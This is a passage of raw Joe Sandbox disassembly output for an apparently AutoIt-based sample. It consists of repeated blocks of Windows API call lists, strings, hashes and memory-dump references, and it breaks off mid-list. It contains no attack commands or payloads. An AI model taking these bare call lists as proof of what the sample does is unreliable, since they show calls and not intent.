                                                                                                                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                        • API String ID: 1839972693-4113822522
                                                                                                                                        • Opcode ID: 70ae52e8c915001176d9f7b1986f4bd50c7cb4f884f83a528b3e2acbdd6594ae
                                                                                                                                        • Instruction ID: 63328ff599f20bec9b0756d3f732214f1856961308c9c3b425c48c596c10c497
                                                                                                                                        • Opcode Fuzzy Hash: 70ae52e8c915001176d9f7b1986f4bd50c7cb4f884f83a528b3e2acbdd6594ae
                                                                                                                                        • Instruction Fuzzy Hash: D171D2326042119FCB10EF24C89196FB7F4EFA4754F1049ADF99A97261EB30EE46CB91
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00B85A2E
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B85A40
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00B85A57
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00B85A6C
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00B85A72
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00B85A82
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00B85A88
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B85AA9
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B85AC3
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00B85ACC
                                                                                                                                        • _wcslen.LIBCMT ref: 00B85B33
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00B85B6F
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00B85B75
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00B85B7C
                                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B85BD3
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00B85BE0
                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00B85C05
                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B85C2F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 895679908-0
                                                                                                                                        • Opcode ID: 47484e5373b34a89d331538279c43aa53b4fee8c8a1529962f3894c7f918e093
                                                                                                                                        • Instruction ID: 0dbc9fcea9d7dd359ec09ccc0f50927ece97ed7e1ed1af4e424fa13f7bd64ac0
                                                                                                                                        • Opcode Fuzzy Hash: 47484e5373b34a89d331538279c43aa53b4fee8c8a1529962f3894c7f918e093
                                                                                                                                        • Instruction Fuzzy Hash: 2A715D31900B09AFDB20EFA9CE85EAEBBF5FF48704F104658E542A75A0DB75E944CB50
                                                                                                                                        APIs
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00B9FE27
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00B9FE32
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00B9FE3D
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00B9FE48
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00B9FE53
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00B9FE5E
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00B9FE69
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00B9FE74
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00B9FE7F
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00B9FE8A
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00B9FE95
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00B9FEA0
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00B9FEAB
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00B9FEB6
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00B9FEC1
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00B9FECC
                                                                                                                                        • GetCursorInfo.USER32(?), ref: 00B9FEDC
                                                                                                                                        • GetLastError.KERNEL32 ref: 00B9FF1E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3215588206-0
                                                                                                                                        • Opcode ID: 72f8717f0cbed358098b6fe7c6bb4f7e497e4e4b256a3525958baf13c38e6635
                                                                                                                                        • Instruction ID: 5242ec4a39d99274d0eed26062d03aa4bd55e81948fde2ca466fdfa227060e22
                                                                                                                                        • Opcode Fuzzy Hash: 72f8717f0cbed358098b6fe7c6bb4f7e497e4e4b256a3525958baf13c38e6635
                                                                                                                                        • Instruction Fuzzy Hash: 5A4154B0D0531A6BDB10DFBA8C8996EBFE8FF04364B50457AE11DE7281DB789901CE91
                                                                                                                                        APIs
                                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00B400C6
                                                                                                                                          • Part of subcall function 00B400ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00BF070C,00000FA0,143F2AC7,?,?,?,?,00B623B3,000000FF), ref: 00B4011C
                                                                                                                                          • Part of subcall function 00B400ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B623B3,000000FF), ref: 00B40127
                                                                                                                                          • Part of subcall function 00B400ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B623B3,000000FF), ref: 00B40138
                                                                                                                                          • Part of subcall function 00B400ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B4014E
                                                                                                                                          • Part of subcall function 00B400ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B4015C
                                                                                                                                          • Part of subcall function 00B400ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B4016A
                                                                                                                                          • Part of subcall function 00B400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B40195
                                                                                                                                          • Part of subcall function 00B400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B401A0
                                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 00B400E7
                                                                                                                                          • Part of subcall function 00B400A3: __onexit.LIBCMT ref: 00B400A9
                                                                                                                                        Strings
                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B40122
                                                                                                                                        • WakeAllConditionVariable, xrefs: 00B40162
                                                                                                                                        • SleepConditionVariableCS, xrefs: 00B40154
                                                                                                                                        • InitializeConditionVariable, xrefs: 00B40148
                                                                                                                                        • kernel32.dll, xrefs: 00B40133
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                                        • Opcode ID: 4e4fe818a5e6b67c3bff9d75f2fd1d99d9656f87653ef2470d9d382bea76301a
                                                                                                                                        • Instruction ID: 877cf151c8267c5239eb186416ba56d2b62bf0a5294db932bd44c7b7b6388b4c
                                                                                                                                        • Opcode Fuzzy Hash: 4e4fe818a5e6b67c3bff9d75f2fd1d99d9656f87653ef2470d9d382bea76301a
                                                                                                                                        • Instruction Fuzzy Hash: 1421D732A547116BE710BB68AC45B7937D4DF04B51F1002B5FA01B36A2DFB49D009A90
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen
                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                        • API String ID: 176396367-1603158881
                                                                                                                                        • Opcode ID: b29749a62d836a68d56985b0b9a80e081e294ab6d2a49b024300afed449ed846
                                                                                                                                        • Instruction ID: 672f00c270d18a98602fc09d7c6a37e81f48a1e70ece6516cf02874bf4c9faed
                                                                                                                                        • Opcode Fuzzy Hash: b29749a62d836a68d56985b0b9a80e081e294ab6d2a49b024300afed449ed846
                                                                                                                                        • Instruction Fuzzy Hash: ECE1B532A00516ABCB24AFB8C4916EDBBF0FF54F10F5481A9E456B7260DB70AF85D790
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,00BBCC08), ref: 00B94527
                                                                                                                                        • _wcslen.LIBCMT ref: 00B9453B
                                                                                                                                        • _wcslen.LIBCMT ref: 00B94599
                                                                                                                                        • _wcslen.LIBCMT ref: 00B945F4
                                                                                                                                        • _wcslen.LIBCMT ref: 00B9463F
                                                                                                                                        • _wcslen.LIBCMT ref: 00B946A7
                                                                                                                                          • Part of subcall function 00B3F9F2: _wcslen.LIBCMT ref: 00B3F9FD
                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00BE6BF0,00000061), ref: 00B94743
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                                        • Opcode ID: 721ee62b3d0768385df0fdebb206fba702034479609963e17c71ea1063316741
                                                                                                                                        • Instruction ID: 595a825a57b47845fbe891748b0c27be2ef3de7bd5cc0d63db6689fe01a0b3be
                                                                                                                                        • Opcode Fuzzy Hash: 721ee62b3d0768385df0fdebb206fba702034479609963e17c71ea1063316741
                                                                                                                                        • Instruction Fuzzy Hash: 58B1F1716083029FCB10DF28D890E6AB7E5EFA5760F5049ADF49AC7291DB30DD46CB62
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemCount.USER32(00BF1990), ref: 00B62F8D
                                                                                                                                        • GetMenuItemCount.USER32(00BF1990), ref: 00B6303D
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00B63081
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00B6308A
                                                                                                                                        • TrackPopupMenuEx.USER32(00BF1990,00000000,?,00000000,00000000,00000000), ref: 00B6309D
                                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B630A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 36266755-4108050209
                                                                                                                                        • Opcode ID: d4f708eb5dc8b5c6995e0955cc92725c5acc9657945594d9418b97e31a9df15c
                                                                                                                                        • Instruction ID: 2163df1c36cc2c55e8a7db47b663aad47491b95cff91270f1470dfcb95667ca6
                                                                                                                                        • Opcode Fuzzy Hash: d4f708eb5dc8b5c6995e0955cc92725c5acc9657945594d9418b97e31a9df15c
                                                                                                                                        • Instruction Fuzzy Hash: 4F713C31640615BFFB219F24DC89FAABFE9FF04724F204256F518661E1C7B9A910DB90
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00BB6DEB
                                                                                                                                          • Part of subcall function 00B26B57: _wcslen.LIBCMT ref: 00B26B6A
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BB6E5F
                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BB6E81
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB6E94
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00BB6EB5
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B20000,00000000), ref: 00BB6EE4
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BB6EFD
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BB6F16
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00BB6F1D
                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BB6F35
                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BB6F4D
                                                                                                                                          • Part of subcall function 00B39944: GetWindowLongW.USER32(?,000000EB), ref: 00B39952
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                        • API String ID: 2429346358-3619404913
                                                                                                                                        • Opcode ID: 8d0130618cffe34fc106a85f615c889579e2ce801960ca3f3cd6d473720c41de
                                                                                                                                        • Instruction ID: f4c67d13375499338b2a17c6be45864ecdd695337b14ee43d6b0d8d4adfd8ba7
                                                                                                                                        • Opcode Fuzzy Hash: 8d0130618cffe34fc106a85f615c889579e2ce801960ca3f3cd6d473720c41de
                                                                                                                                        • Instruction Fuzzy Hash: 00715675504244AFDB21CF28DC49EBABBE9FB89304F04495DF98987261CBB4ED06CB11
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00B39BB2
                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00BB9147
                                                                                                                                          • Part of subcall function 00BB7674: ClientToScreen.USER32(?,?), ref: 00BB769A
                                                                                                                                          • Part of subcall function 00BB7674: GetWindowRect.USER32(?,?), ref: 00BB7710
                                                                                                                                          • Part of subcall function 00BB7674: PtInRect.USER32(?,?,00BB8B89), ref: 00BB7720
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00BB91B0
                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BB91BB
                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BB91DE
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BB9225
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00BB923E
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00BB9255
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00BB9277
                                                                                                                                        • DragFinish.SHELL32(?), ref: 00BB927E
                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BB9371
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                        • API String ID: 221274066-3440237614
                                                                                                                                        • Opcode ID: 6d526f8a1932d9c7a6c46db20f1fa0f5a912afe5d6c610f12820845cbc8d79ff
                                                                                                                                        • Instruction ID: c1b4e318efc52f1c6c5fe9939edc28e2448d6d45df1e071395d7513954db2575
                                                                                                                                        • Opcode Fuzzy Hash: 6d526f8a1932d9c7a6c46db20f1fa0f5a912afe5d6c610f12820845cbc8d79ff
                                                                                                                                        • Instruction Fuzzy Hash: B8615E71108301AFD701DF55DC85DAFBBE8EF89750F000AADF59A931A1DBB09A49CB92
                                                                                                                                        APIs
                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B9C4B0
                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B9C4C3
                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B9C4D7
                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B9C4F0
                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B9C533
                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B9C549
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B9C554
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B9C584
                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B9C5DC
                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B9C5F0
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00B9C5FB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3800310941-3916222277
                                                                                                                                        • Opcode ID: fb5ca4de1f5077c19cd3cbe5c23931e016c8da8f49820f59d3165c4c904dd165
                                                                                                                                        • Instruction ID: 085c5a6f5cbd4f957397c3bfacefd83a51aa3eb6266863ddbd9004ca6eaa72c1
                                                                                                                                        • Opcode Fuzzy Hash: fb5ca4de1f5077c19cd3cbe5c23931e016c8da8f49820f59d3165c4c904dd165
                                                                                                                                        • Instruction Fuzzy Hash: F65159B0600208BFEB21CF61C989AAB7FFCFB19744F104569F94697210DB70EA44DB60
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00BB8592
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00BB85A2
                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00BB85AD
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BB85BA
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BB85C8
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00BB85D7
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BB85E0
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BB85E7
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00BB85F8
                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BBFC38,?), ref: 00BB8611
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00BB8621
                                                                                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00BB8641
                                                                                                                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00BB8671
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00BB8699
                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BB86AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                        • Opcode ID: 63d12d160aa7a759046fc52131117e8d4d85889dc89fba1035945180a106e7bb
                                                                                                                                        • Instruction ID: 9b928dd3d207ea951f753093997f9d505e72e29af1796eec5b79bf5b15e02793
                                                                                                                                        • Opcode Fuzzy Hash: 63d12d160aa7a759046fc52131117e8d4d85889dc89fba1035945180a106e7bb
                                                                                                                                        • Instruction Fuzzy Hash: E141F975600205AFDB11DFA5DC88EAA7BBCEF89711F104159F906E7260DBB09D01CB60
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00B91502
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00B9150B
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B91517
                                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B915FB
                                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00B91657
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B91708
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00B9178C
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B917D8
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B917E7
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00B91823
